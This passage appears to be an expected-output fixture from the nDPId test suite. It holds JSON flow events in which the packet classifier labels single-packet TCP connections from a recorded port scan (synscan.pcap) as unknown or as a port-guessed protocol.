+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","ndpi": 